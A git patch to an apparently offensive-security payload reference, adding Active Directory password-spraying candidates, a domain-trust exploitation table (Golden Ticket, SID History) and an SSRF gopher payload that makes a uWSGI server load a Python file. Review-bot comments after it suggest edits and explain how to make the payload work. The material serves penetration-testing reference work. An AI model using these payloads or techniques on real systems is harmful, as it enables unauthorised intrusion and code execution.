From 71171fa78bb344d252c55b6d013f3054a83c9a91 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 5 Jan 2020 22:11:28 +0100 Subject: [PATCH] SSRF exploiting WSGI --- .../Active Directory Attack.md | 33 ++++++++++++++++--- Server Side Request Forgery/README.md | 23 +++++++++++++ 2 files changed, 52 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 31265dec..0ec49c36 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern Most of the time the best passwords to spray are : -- Password123 -- Welcome1 +- Password123, mimikatz +- Welcome1/Welcome01 - $Companyname1 : $Microsoft1 -- SeasonYear : Winter2019* +- SeasonYear : Winter2019*,Spring2020!,Summer2018? - Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) #### Kerberos pre-auth bruteforcing @@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr ### Trust relationship between domains +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + +#### Enumerate trusts between domains + ```powershell nltest /trusted_domains ``` 
@@ -1047,6 +1058,19 @@ SourceName TargetName TrustType TrustDirection domainA.local domainB.local TreeRoot Bidirectional ``` +#### Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | + + + ### Child Domain to Forest Compromise - SID Hijacking Most trees are linked with dual sided trust relationships to allow for sharing of resources. @@ -1498,4 +1522,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) -* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) \ No newline at end of file +* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file 
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 88e7db0f..46cb2f3b 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -29,6 +29,7 @@ * [ldap://](#ldap) * [gopher://](#gopher) * [netdoc://](#netdoc) +* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) @@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters. ssrf.php?url=gopher://127.0.0.1:4242/DATA ``` +## SSRF exploiting WSGI + +Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py. + +```powershell +gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py +``` + +| Header | | | +|-----------|-----------|-------------| +| modifier1 | (1 byte) | 0 (%00) | +| datasize | (2 bytes) | 26 (%1A%00) | +| modifier2 | (1 byte) | 0 (%00) | + +| Variable (UWSGI_FILE) | | | | | +|-----------------------|-----------|----|------------|---| +| key length | (2 bytes) | 10 | (%0A%00) | | +| key data | (m bytes) | | UWSGI_FILE | | +| value length | (2 bytes) | 12 | (%0C%00) | | +| value data | (n bytes) | | /tmp/test.py | | + + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
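Review bot: in the password-spraying hunk of `Methodology and Resources/Active Directory Attack.md`, `+- Password123, mimikatz` puts a tool name in a list of candidate passwords; unless there is a reason to believe users actually pick `mimikatz`, drop it or explain it, and keep one candidate per bullet as the surrounding list does. In `+- SeasonYear : Winter2019*,Spring2020!,Summer2018?` add a space after each comma so the separator matches the `Welcome1/Welcome01` entry and the rest of the list.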
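Review bot: the new `* One-way` / `* Two-way` bullets under `### Trust relationship between domains` never name the direction vocabulary that the enumeration output right below them uses, so a reader has nothing to map `TrustDirection ... Bidirectional` (in the `domainA.local domainB.local TreeRoot Bidirectional` line) back to. Add the terms in the bullets, for example "Domain B trusts A (B is the trusting domain, A the trusted domain; the trust is outbound from B, inbound to A)", so the one-way case and the `nltest` / PowerView columns line up.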
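Review bot: in the `#### Exploit trusts between domains` hunk the warning reads `:warning: Require a Domain-Admin level access to the current domain.` and should be "Requires Domain Admin level access". The last table row, `| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) |`, carries a `?` in the technique cell, which is the only signal that this row is unconfirmed; say so in words (or remove the row until it is verified) rather than shipping a question mark in a reference table. The `Trust relationship` column also mixes trust type and direction in one cell; split it or rename the header to match. Finally there are two stray blank lines between the table and `### Child Domain to Forest Compromise - SID Hijacking`.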
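Review bot: the new reference `* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/...)` links a personal Dropbox share, which will rot, and does not follow the `Title - Date - Author` form used by every other entry in the list; cite the talk title, venue (Rooted2019), author and, if available, a conference-hosted or archived URL instead. Since this hunk already touches the tail of the list, the two broken context links could be fixed in the same patch: `https:/www.sqlshack.com/...` is missing a slash and `pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/` has no scheme. The file also still ends without a trailing newline (`\ No newline at end of file` on both sides).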
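Review bot: the table-of-contents entry `+* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)` names the wrong thing. WSGI is the Python application interface; what the section attacks is the uWSGI server's binary `uwsgi` protocol, as the variable `UWSGI_FILE` and the linked `uwsgi_exp.py` show. Rename the entry (and the matching heading and anchor) to "SSRF exploiting uWSGI" so it is not mistaken for a generic WSGI weakness.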
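Review bot: the `## SSRF exploiting WSGI` hunk needs three caveats before the payload is usable, plus two presentation fixes. First, the leading `_` in `gopher://localhost:8000/_%00%1A%00...` is the gopher item-type byte that the client (e.g. curl) strips before sending; say so, otherwise readers will count it into `datasize`. Second, `/tmp/test.py` is a file the packet tells uWSGI to load, so it must already exist on the target; state that prerequisite and how the file gets there (the linked `uwsgi_exp.py` is the place to point to). Third, port 8000 has to be a uwsgi-protocol listener (`socket = :8000`), not an `http-socket`, which expects HTTP and will not parse this packet. On presentation: the fence is tagged `powershell` but contains a gopher URL, so use an untagged fence; and both tables have empty header cells (`| Header | | |`, `| Variable (UWSGI_FILE) | | | | |`), so give them `Field | Size | Value` headers and drop the unused fifth column. It would also help to spell out that `datasize` is the body length, here `2 + 10 + 2 + 12 = 26 = 0x1A`, so the reader can recompute it for a different key or path.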